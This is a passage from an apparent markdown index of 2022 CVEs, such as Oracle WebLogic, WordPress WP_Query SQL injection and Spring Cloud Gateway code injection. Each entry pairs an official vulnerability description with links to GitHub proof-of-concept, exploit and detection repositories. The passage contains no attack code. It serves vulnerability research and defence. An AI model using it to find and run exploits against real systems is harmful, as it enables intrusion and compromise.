malformed and invalid. A malformed RSA key is not functional, and a TLS client connection to a device that is running Cisco ASA Software or Cisco FTD Software that uses the malformed RSA key will result in a TLS signature failure, which means a vulnerable software release created an invalid RSA signature that failed verification. If an attacker obtains the RSA private key, they could use the key to impersonate a device that is running Cisco ASA Software or Cisco FTD Software or to decrypt the device traffic. + + +- [CiscoPSIRT/CVE-2022-20866](https://github.com/CiscoPSIRT/CVE-2022-20866) + +### CVE-2022-21241 (2022-02-08) + +Cross-site scripting vulnerability in CSV+ prior to 0.8.1 allows a remote unauthenticated attacker to inject an arbitrary script or an arbitrary OS command via a specially crafted CSV file that contains HTML a tag. + + +- [satoki/csv-plus_vulnerability](https://github.com/satoki/csv-plus_vulnerability) + +### CVE-2022-21306 (2022-01-19) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [hktalent/CVE-2022-21306](https://github.com/hktalent/CVE-2022-21306) + +### CVE-2022-21340 (2022-01-19) + +Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.0.1; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). + + +- [Alexandre-Bartel/CVE-2022-21340](https://github.com/Alexandre-Bartel/CVE-2022-21340) + +### CVE-2022-21350 (2022-01-19) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle WebLogic Server. CVSS 3.1 Base Score 6.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L). + + +- [hktalent/CVE-2022-21350](https://github.com/hktalent/CVE-2022-21350) + +### CVE-2022-21371 (2022-01-19) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Container). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). + + +- [Mr-xn/CVE-2022-21371](https://github.com/Mr-xn/CVE-2022-21371) +- [Vulnmachines/Oracle-WebLogic-CVE-2022-21371](https://github.com/Vulnmachines/Oracle-WebLogic-CVE-2022-21371) +- [Cappricio-Securities/CVE-2022-21371](https://github.com/Cappricio-Securities/CVE-2022-21371) + +### CVE-2022-21392 (2022-01-19) + +Vulnerability in the Enterprise Manager Base Platform product of Oracle Enterprise Manager (component: Policy Framework). Supported versions that are affected are 13.4.0.0 and 13.5.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Enterprise Manager Base Platform. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Enterprise Manager Base Platform accessible data as well as unauthorized update, insert or delete access to some of Enterprise Manager Base Platform accessible data. CVSS 3.1 Base Score 8.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H). + + +- [mbadanoiu/CVE-2022-21392](https://github.com/mbadanoiu/CVE-2022-21392) + +### CVE-2022-21445 (2022-04-19) + +Vulnerability in the Oracle Application Development Framework (ADF) product of Oracle Fusion Middleware (component: ADF Faces). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Application Development Framework (ADF). Successful attacks of this vulnerability can result in takeover of Oracle Application Development Framework (ADF). Note: Oracle Application Development Framework (ADF) is downloaded via Oracle JDeveloper Product. Please refer to Fusion Middleware Patch Advisor for more details. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [M0chae1/CVE-2022-21445](https://github.com/M0chae1/CVE-2022-21445) +- [hienkiet/CVE-2022-21445-for-12.2.1.3.0-Weblogic](https://github.com/hienkiet/CVE-2022-21445-for-12.2.1.3.0-Weblogic) + +### CVE-2022-21449 (2022-04-19) + +Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 17.0.2 and 18; Oracle GraalVM Enterprise Edition: 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N). + + +- [jfrog/jfrog-CVE-2022-21449](https://github.com/jfrog/jfrog-CVE-2022-21449) +- [jmiettinen/CVE-2022-21449-vuln-test](https://github.com/jmiettinen/CVE-2022-21449-vuln-test) +- [notkmhn/CVE-2022-21449-TLS-PoC](https://github.com/notkmhn/CVE-2022-21449-TLS-PoC) +- [marschall/psychic-signatures](https://github.com/marschall/psychic-signatures) +- [thack1/CVE-2022-21449](https://github.com/thack1/CVE-2022-21449) +- [Damok82/SignChecker](https://github.com/Damok82/SignChecker) +- [fundaergn/CVE-2022-21449](https://github.com/fundaergn/CVE-2022-21449) +- [Skipper7718/CVE-2022-21449-showcase](https://github.com/Skipper7718/CVE-2022-21449-showcase) +- [davwwwx/CVE-2022-21449](https://github.com/davwwwx/CVE-2022-21449) +- [AlexanderZinoni/CVE-2022-21449](https://github.com/AlexanderZinoni/CVE-2022-21449) +- [HeyMrSalt/AIS3-2024-Project-D5Team](https://github.com/HeyMrSalt/AIS3-2024-Project-D5Team) + +### CVE-2022-21500 (2022-05-19) + +Vulnerability in Oracle E-Business Suite (component: Manage Proxies). The supported version that is affected is 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle E-Business Suite. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. Note: Authentication is required for successful attack, however the user may be self-registered. <br> <br>Oracle E-Business Suite 12.1 is not impacted by this vulnerability. Customers should refer to the Patch Availability Document for details. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). + + +- [Cappricio-Securities/CVE-2022-21500](https://github.com/Cappricio-Securities/CVE-2022-21500) + +### CVE-2022-21587 (2022-10-18) + +Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [hieuminhnv/CVE-2022-21587-POC](https://github.com/hieuminhnv/CVE-2022-21587-POC) +- [rockmelodies/Oracle-E-BS-CVE-2022-21587-Exploit](https://github.com/rockmelodies/Oracle-E-BS-CVE-2022-21587-Exploit) +- [sahabrifki/CVE-2022-21587-Oracle-EBS-](https://github.com/sahabrifki/CVE-2022-21587-Oracle-EBS-) + +### CVE-2022-21658 (2022-01-20) + +Rust is a multi-paradigm, general-purpose programming language designed for performance and safety, especially safe concurrency. The Rust Security Response WG was notified that the `std::fs::remove_dir_all` standard library function is vulnerable a race condition enabling symlink following (CWE-363). An attacker could use this security issue to trick a privileged program into deleting files and directories the attacker couldn't otherwise access or delete. Rust 1.0.0 through Rust 1.58.0 is affected by this vulnerability with 1.58.1 containing a patch. Note that the following build targets don't have usable APIs to properly mitigate the attack, and are thus still vulnerable even with a patched toolchain: macOS before version 10.10 (Yosemite) and REDOX. We recommend everyone to update to Rust 1.58.1 as soon as possible, especially people developing programs expected to run in privileged contexts (including system daemons and setuid binaries), as those have the highest risk of being affected by this. Note that adding checks in your codebase before calling remove_dir_all will not mitigate the vulnerability, as they would also be vulnerable to race conditions like remove_dir_all itself. The existing mitigation is working as intended outside of race conditions. + + +- [sagittarius-a/cve-2022-21658](https://github.com/sagittarius-a/cve-2022-21658) + +### CVE-2022-21660 (2022-02-09) + +Gin-vue-admin is a backstage management system based on vue and gin. In versions prior to 2.4.7 low privilege users are able to modify higher privilege users. Authentication is missing on the `setUserInfo` function. Users are advised to update as soon as possible. There are no known workarounds. + + +- [UzJu/Gin-Vue-admin-poc-CVE-2022-21660](https://github.com/UzJu/Gin-Vue-admin-poc-CVE-2022-21660) +- [UzJu/CVE-2022-21660](https://github.com/UzJu/CVE-2022-21660) + +### CVE-2022-21661 (2022-01-06) + +WordPress is a free and open-source content management system written in PHP and paired with a MariaDB database. Due to improper sanitization in WP_Query, there can be cases where SQL injection is possible through plugins or themes that use it in a certain way. This has been patched in WordPress version 5.8.3. Older affected versions are also fixed via security release, that go back till 3.7.37. We strongly recommend that you keep auto-updates enabled. There are no known workarounds for this vulnerability. + + +- [TAPESH-TEAM/CVE-2022-21661-WordPress-Core-5.8.2-WP_Query-SQL-Injection](https://github.com/TAPESH-TEAM/CVE-2022-21661-WordPress-Core-5.8.2-WP_Query-SQL-Injection) +- [purple-WL/wordpress-CVE-2022-21661](https://github.com/purple-WL/wordpress-CVE-2022-21661) +- [0x4E0x650x6F/Wordpress-cve-CVE-2022-21661](https://github.com/0x4E0x650x6F/Wordpress-cve-CVE-2022-21661) +- [z92g/CVE-2022-21661](https://github.com/z92g/CVE-2022-21661) +- [guestzz/CVE-2022-21661](https://github.com/guestzz/CVE-2022-21661) +- [safe3s/CVE-2022-21661](https://github.com/safe3s/CVE-2022-21661) +- [WellingtonEspindula/SSI-CVE-2022-21661](https://github.com/WellingtonEspindula/SSI-CVE-2022-21661) +- [daniel616/CVE-2022-21661-Demo](https://github.com/daniel616/CVE-2022-21661-Demo) +- [sealldeveloper/CVE-2022-21661-PoC](https://github.com/sealldeveloper/CVE-2022-21661-PoC) +- [p4ncontomat3/CVE-2022-21661](https://github.com/p4ncontomat3/CVE-2022-21661) +- [CharonDefalt/WordPress--CVE-2022-21661](https://github.com/CharonDefalt/WordPress--CVE-2022-21661) +- [w0r1i0g1ht/CVE-2022-21661](https://github.com/w0r1i0g1ht/CVE-2022-21661) +- [kittypurrnaz/cve-2022-21661](https://github.com/kittypurrnaz/cve-2022-21661) + +### CVE-2022-21668 (2022-01-10) + +pipenv is a Python development workflow tool. Starting with version 2018.10.9 and prior to version 2022.1.8, a flaw in pipenv's parsing of requirements files allows an attacker to insert a specially crafted string inside a comment anywhere within a requirements.txt file, which will cause victims who use pipenv to install the requirements file to download dependencies from a package index server controlled by the attacker. By embedding malicious code in packages served from their malicious index server, the attacker can trigger arbitrary remote code execution (RCE) on the victims' systems. If an attacker is able to hide a malicious `--index-url` option in a requirements file that a victim installs with pipenv, the attacker can embed arbitrary malicious code in packages served from their malicious index server that will be executed on the victim's host during installation (remote code execution/RCE). When pip installs from a source distribution, any code in the setup.py is executed by the install process. This issue is patched in version 2022.1.8. The GitHub Security Advisory contains more information about this vulnerability. + + +- [sreeram281997/CVE-2022-21668-Pipenv-RCE-vulnerability](https://github.com/sreeram281997/CVE-2022-21668-Pipenv-RCE-vulnerability) + +### CVE-2022-21724 (2022-02-02) + +pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when attacker control the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. This can lead to code execution loaded via arbitrary classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue. + + +- [ToontjeM/CVE-2022-21724](https://github.com/ToontjeM/CVE-2022-21724) + +### CVE-2022-21728 (2022-02-03) + +Tensorflow is an Open Source Machine Learning Framework. The implementation of shape inference for `ReverseSequence` does not fully validate the value of `batch_dim` and can result in a heap OOB read. There is a check to make sure the value of `batch_dim` does not go over the rank of the input, but there is no check for negative values. Negative dimensions are allowed in some cases to mimic Python's negative indexing (i.e., indexing from the end of the array), however if the value is too negative then the implementation of `Dim` would access elements before the start of an array. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range. + + +- [mwina/CVE-2022-21728-test](https://github.com/mwina/CVE-2022-21728-test) + +### CVE-2022-21789 (2022-08-01) + +In audio ipi, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS06478101; Issue ID: ALPS06478101. + + +- [docfate111/CVE-2022-21789](https://github.com/docfate111/CVE-2022-21789) + +### CVE-2022-21839 (2022-01-11) + +Windows Event Tracing Discretionary Access Control List Denial of Service Vulnerability + + +- [lolin19/CVE-2022-21839-](https://github.com/lolin19/CVE-2022-21839-) + +### CVE-2022-21877 (2022-01-11) + +Storage Spaces Controller Information Disclosure Vulnerability + + +- [Big5-sec/cve-2022-21877](https://github.com/Big5-sec/cve-2022-21877) + +### CVE-2022-21881 (2022-01-11) + +Windows Kernel Elevation of Privilege Vulnerability + + +- [theabysslabs/CVE-2022-21881](https://github.com/theabysslabs/CVE-2022-21881) + +### CVE-2022-21882 (2022-01-11) + +Win32k Elevation of Privilege Vulnerability + + +- [KaLendsi/CVE-2022-21882](https://github.com/KaLendsi/CVE-2022-21882) +- [David-Honisch/CVE-2022-21882](https://github.com/David-Honisch/CVE-2022-21882) +- [L4ys/CVE-2022-21882](https://github.com/L4ys/CVE-2022-21882) +- [sailay1996/cve-2022-21882-poc](https://github.com/sailay1996/cve-2022-21882-poc) +- [r1l4-i3pur1l4/CVE-2022-21882](https://github.com/r1l4-i3pur1l4/CVE-2022-21882) +- [dishfwk/CVE-2022-21882](https://github.com/dishfwk/CVE-2022-21882) + +### CVE-2022-21894 (2022-01-11) + +Secure Boot Security Feature Bypass Vulnerability + + +- [Wack0/CVE-2022-21894](https://github.com/Wack0/CVE-2022-21894) +- [ASkyeye/CVE-2022-21894-Payload](https://github.com/ASkyeye/CVE-2022-21894-Payload) +- [Wack0/batondrop_armv7](https://github.com/Wack0/batondrop_armv7) +- [bakedmuffinman/BlackLotusDetection](https://github.com/bakedmuffinman/BlackLotusDetection) +- [qjawls2003/BlackLotus-Detection](https://github.com/qjawls2003/BlackLotus-Detection) +- [nova-master/CVE-2022-21894-Payload-New](https://github.com/nova-master/CVE-2022-21894-Payload-New) + +### CVE-2022-21907 (2022-01-11) + +HTTP Protocol Stack Remote Code Execution Vulnerability + + +- [corelight/cve-2022-21907](https://github.com/corelight/cve-2022-21907) +- [mauricelambert/CVE-2022-21907](https://github.com/mauricelambert/CVE-2022-21907) +- [ZZ-SOCMAP/CVE-2022-21907](https://github.com/ZZ-SOCMAP/CVE-2022-21907) +- [xiska62314/CVE-2022-21907](https://github.com/xiska62314/CVE-2022-21907) +- [p0dalirius/CVE-2022-21907-http.sys](https://github.com/p0dalirius/CVE-2022-21907-http.sys) +- [michelep/CVE-2022-21907-Vulnerability-PoC](https://github.com/michelep/CVE-2022-21907-Vulnerability-PoC) +- [polakow/CVE-2022-21907](https://github.com/polakow/CVE-2022-21907) +- [gpiechnik2/nmap-CVE-2022-21907](https://github.com/gpiechnik2/nmap-CVE-2022-21907) +- [iveresk/cve-2022-21907-http.sys](https://github.com/iveresk/cve-2022-21907-http.sys) +- [iveresk/cve-2022-21907](https://github.com/iveresk/cve-2022-21907) +- [Malwareman007/CVE-2022-21907](https://github.com/Malwareman007/CVE-2022-21907) +- [0xmaximus/Home-Demolisher](https://github.com/0xmaximus/Home-Demolisher) +- [cassie0206/CVE-2022-21907](https://github.com/cassie0206/CVE-2022-21907) +- [EzoomE/CVE-2022-21907-RCE](https://github.com/EzoomE/CVE-2022-21907-RCE) +- [asepsaepdin/CVE-2022-21907](https://github.com/asepsaepdin/CVE-2022-21907) +- [kamal-marouane/CVE-2022-21907](https://github.com/kamal-marouane/CVE-2022-21907) + +### CVE-2022-21970 (2022-01-11) + +Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability + + +- [Malwareman007/CVE-2022-21970](https://github.com/Malwareman007/CVE-2022-21970) + +### CVE-2022-21971 (2022-02-09) + +Windows Runtime Remote Code Execution Vulnerability + + +- [0vercl0k/CVE-2022-21971](https://github.com/0vercl0k/CVE-2022-21971) +- [tufanturhan/CVE-2022-21971-Windows-Runtime-RCE](https://github.com/tufanturhan/CVE-2022-21971-Windows-Runtime-RCE) +- [Malwareman007/CVE-2022-21971](https://github.com/Malwareman007/CVE-2022-21971) + +### CVE-2022-21974 (2022-02-09) + +Roaming Security Rights Management Services Remote Code Execution Vulnerability + + +- [0vercl0k/CVE-2022-21974](https://github.com/0vercl0k/CVE-2022-21974) + +### CVE-2022-21984 (2022-02-09) + +Windows DNS Server Remote Code Execution Vulnerability + + +- [u201424348/CVE-2022-21984](https://github.com/u201424348/CVE-2022-21984) + +### CVE-2022-21999 (2022-02-09) + +Windows Print Spooler Elevation of Privilege Vulnerability + + +- [ly4k/SpoolFool](https://github.com/ly4k/SpoolFool) + +### CVE-2022-22029 (2022-07-12) + +Windows Network File System Remote Code Execution Vulnerability + + +- [mchoudhary15/CVE-2022-22029-NFS-Server-](https://github.com/mchoudhary15/CVE-2022-22029-NFS-Server-) + +### CVE-2022-22057 (2022-06-14) + +Use after free in graphics fence due to a race condition while closing fence file descriptor and destroy graphics timeline simultaneously in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables + + +- [diabl0w/CVE-2022-22057_SM-F926U](https://github.com/diabl0w/CVE-2022-22057_SM-F926U) + +### CVE-2022-22063 (2022-12-14) + +Memory corruption in Core due to improper configuration in boot remapper. + + +- [msm8916-mainline/CVE-2022-22063](https://github.com/msm8916-mainline/CVE-2022-22063) + +### CVE-2022-22274 (2022-03-25) + +A Stack-based buffer overflow vulnerability in the SonicOS via HTTP request allows a remote unauthenticated attacker to cause Denial of Service (DoS) or potentially results in code execution in the firewall. + + +- [4lucardSec/Sonic_CVE-2022-22274_poc](https://github.com/4lucardSec/Sonic_CVE-2022-22274_poc) +- [forthisvideo/CVE-2022-22274_poc](https://github.com/forthisvideo/CVE-2022-22274_poc) +- [BishopFox/CVE-2022-22274_CVE-2023-0656](https://github.com/BishopFox/CVE-2022-22274_CVE-2023-0656) + +### CVE-2022-22296 (2022-01-24) + +Sourcecodester Hospital's Patient Records Management System 1.0 is vulnerable to Insecure Permissions via the id parameter in manage_user endpoint. Simply change the value and data of other users can be displayed. + + +- [vlakhani28/CVE-2022-22296](https://github.com/vlakhani28/CVE-2022-22296) + +### CVE-2022-22536 (2022-02-09) + +SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.\n\n + + +- [ZZ-SOCMAP/CVE-2022-22536](https://github.com/ZZ-SOCMAP/CVE-2022-22536) +- [tess-ss/SAP-memory-pipes-desynchronization-vulnerability-MPI-CVE-2022-22536](https://github.com/tess-ss/SAP-memory-pipes-desynchronization-vulnerability-MPI-CVE-2022-22536) + +### CVE-2022-22555 (2022-07-20) + +Dell EMC PowerStore, contains an OS command injection Vulnerability. A locally authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the PowerStore underlying OS, with the privileges of the vulnerable application. Exploitation may lead to an elevation of privilege. + + +- [colaoo123/cve-2022-22555](https://github.com/colaoo123/cve-2022-22555) + +### CVE-2022-22582 (2023-02-27) + +A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5, macOS Monterey 12.3. A local user may be able to write arbitrary files. + + +- [poizon-box/CVE-2022-22582](https://github.com/poizon-box/CVE-2022-22582) + +### CVE-2022-22600 (2022-03-18) + +The issue was addressed with improved permissions logic. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A malicious application may be able to bypass certain Privacy preferences. + + +- [KlinKlinKlin/MSF-screenrecord-on-MacOS](https://github.com/KlinKlinKlin/MSF-screenrecord-on-MacOS) + +### CVE-2022-22620 (2022-03-18) + +A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. + + +- [kmeps4/CVE-2022-22620](https://github.com/kmeps4/CVE-2022-22620) +- [springsec/CVE-2022-22620](https://github.com/springsec/CVE-2022-22620) +- [bb33bb/dkjiayu.github.io](https://github.com/bb33bb/dkjiayu.github.io) + +### CVE-2022-22629 (2022-09-23) + +A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.3, Safari 15.4, watchOS 8.5, iTunes 12.12.3 for Windows, iOS 15.4 and iPadOS 15.4, tvOS 15.4. Processing maliciously crafted web content may lead to arbitrary code execution. + + +- [parsdefense/CVE-2022-22629](https://github.com/parsdefense/CVE-2022-22629) + +### CVE-2022-22639 (2022-03-18) + +A logic issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. An application may be able to gain elevated privileges. + + +- [jhftss/CVE-2022-22639](https://github.com/jhftss/CVE-2022-22639) + +### CVE-2022-22718 (2022-02-09) + +Windows Print Spooler Elevation of Privilege Vulnerability + + +- [ahmetfurkans/CVE-2022-22718](https://github.com/ahmetfurkans/CVE-2022-22718) + +### CVE-2022-22720 (2022-03-14) + +Apache HTTP Server 2.4.52 and earlier fails to close inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling + + +- [Benasin/CVE-2022-22720](https://github.com/Benasin/CVE-2022-22720) + +### CVE-2022-22733 (2022-01-20) + +Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions. + + +- [Zeyad-Azima/CVE-2022-22733](https://github.com/Zeyad-Azima/CVE-2022-22733) + +### CVE-2022-22814 (2022-03-10) + +The System Diagnosis service of MyASUS before 3.1.2.0 allows privilege escalation. + + +- [DShankle/CVE-2022-22814_PoC](https://github.com/DShankle/CVE-2022-22814_PoC) + +### CVE-2022-22818 (2022-02-03) + +The {% debug %} template tag in Django 2.2 before 2.2.27, 3.2 before 3.2.12, and 4.0 before 4.0.2 does not properly encode the current context. This may lead to XSS. + + +- [Prikalel/django-xss-example](https://github.com/Prikalel/django-xss-example) + +### CVE-2022-22822 (2022-01-08) + +addBinding in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. + + +- [nanopathi/external_expat_AOSP10_r33_CVE-2022-22822toCVE-2022-22827](https://github.com/nanopathi/external_expat_AOSP10_r33_CVE-2022-22822toCVE-2022-22827) + +### CVE-2022-22828 (2022-01-27) + +An insecure direct object reference for the file-download URL in Synametrics SynaMan before 5.0 allows a remote attacker to access unshared files via a modified base64-encoded filename string. + + +- [videnlabs/CVE-2022-22828](https://github.com/videnlabs/CVE-2022-22828) + +### CVE-2022-22845 (2022-01-09) + +QXIP SIPCAPTURE homer-app before 1.4.28 for HOMER 7.x has the same 167f0db2-f83e-4baa-9736-d56064a5b415 JWT secret key across different customers' installations. + + +- [OmriBaso/CVE-2022-22845-Exploit](https://github.com/OmriBaso/CVE-2022-22845-Exploit) + +### CVE-2022-22850 (2022-01-26) + +A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodtester Hospital's Patient Records Management System 1.0 via the description parameter in room_types. + + +- [Sant268/CVE-2022-22850](https://github.com/Sant268/CVE-2022-22850) + +### CVE-2022-22851 (2022-01-26) + +A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodtester Hospital's Patient Records Management System 1.0 via the specialization parameter in doctors.php + + +- [Sant268/CVE-2022-22851](https://github.com/Sant268/CVE-2022-22851) + +### CVE-2022-22852 (2022-01-26) + +A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodtester Hospital's Patient Records Management System 1.0 via the description parameter in room_list. + + +- [Sant268/CVE-2022-22852](https://github.com/Sant268/CVE-2022-22852) + +### CVE-2022-22885 (2022-02-16) + +Hutool v5.7.18's HttpRequest was discovered to ignore all TLS/SSL certificate validation. + + +- [miguelc49/CVE-2022-22885-2](https://github.com/miguelc49/CVE-2022-22885-2) +- [miguelc49/CVE-2022-22885-1](https://github.com/miguelc49/CVE-2022-22885-1) + +### CVE-2022-22909 (2022-03-02) + +HotelDruid v3.0.3 was discovered to contain a remote code execution (RCE) vulnerability which is exploited via an attacker inserting a crafted payload into the name field under the Create New Room module. + + +- [0z09e/CVE-2022-22909](https://github.com/0z09e/CVE-2022-22909) +- [kaal18/CVE-2022-22909](https://github.com/kaal18/CVE-2022-22909) + +### CVE-2022-22916 (2022-02-17) + +O2OA v6.4.7 was discovered to contain a remote code execution (RCE) vulnerability via /x_program_center/jaxrs/invoke. + + +- [0x7eTeam/CVE-2022-22916](https://github.com/0x7eTeam/CVE-2022-22916) + +### CVE-2022-22947 (2022-03-03) + +In spring cloud gateway versions prior to 3.1.1+ and 3.0.7+ , applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host. + + +- [lucksec/Spring-Cloud-Gateway-CVE-2022-22947](https://github.com/lucksec/Spring-Cloud-Gateway-CVE-2022-22947) +- [scopion/cve-2022-22947](https://github.com/scopion/cve-2022-22947) +- [Vulnmachines/spring-cve-2022-22947](https://github.com/Vulnmachines/spring-cve-2022-22947) +- [Axx8/CVE-2022-22947_Rce_Exp](https://github.com/Axx8/CVE-2022-22947_Rce_Exp) +- [crowsec-edtech/CVE-2022-22947](https://github.com/crowsec-edtech/CVE-2022-22947) +- [Tas9er/SpringCloudGatewayRCE](https://github.com/Tas9er/SpringCloudGatewayRCE) +- [Greetdawn/CVE-2022-22947](https://github.com/Greetdawn/CVE-2022-22947) +- [Summer177/Spring-Cloud-Gateway-CVE-2022-22947](https://github.com/Summer177/Spring-Cloud-Gateway-CVE-2022-22947) +- [BerMalBerIst/CVE-2022-22947](https://github.com/BerMalBerIst/CVE-2022-22947) +- [tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway](https://github.com/tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway) +- [dingxiao77/-cve-2022-22947-](https://github.com/dingxiao77/-cve-2022-22947-) +- [flying0er/CVE-2022-22947-goby](https://github.com/flying0er/CVE-2022-22947-goby) +- [dbgee/CVE-2022-22947](https://github.com/dbgee/CVE-2022-22947) +- [nu0l/cve-2022-22947](https://github.com/nu0l/cve-2022-22947) +- [nanaao/CVE-2022-22947-POC](https://github.com/nanaao/CVE-2022-22947-POC) +- [hunzi0/CVE-2022-22947-Rce_POC](https://github.com/hunzi0/CVE-2022-22947-Rce_POC) +- [22ke/CVE-2022-22947](https://github.com/22ke/CVE-2022-22947) +- 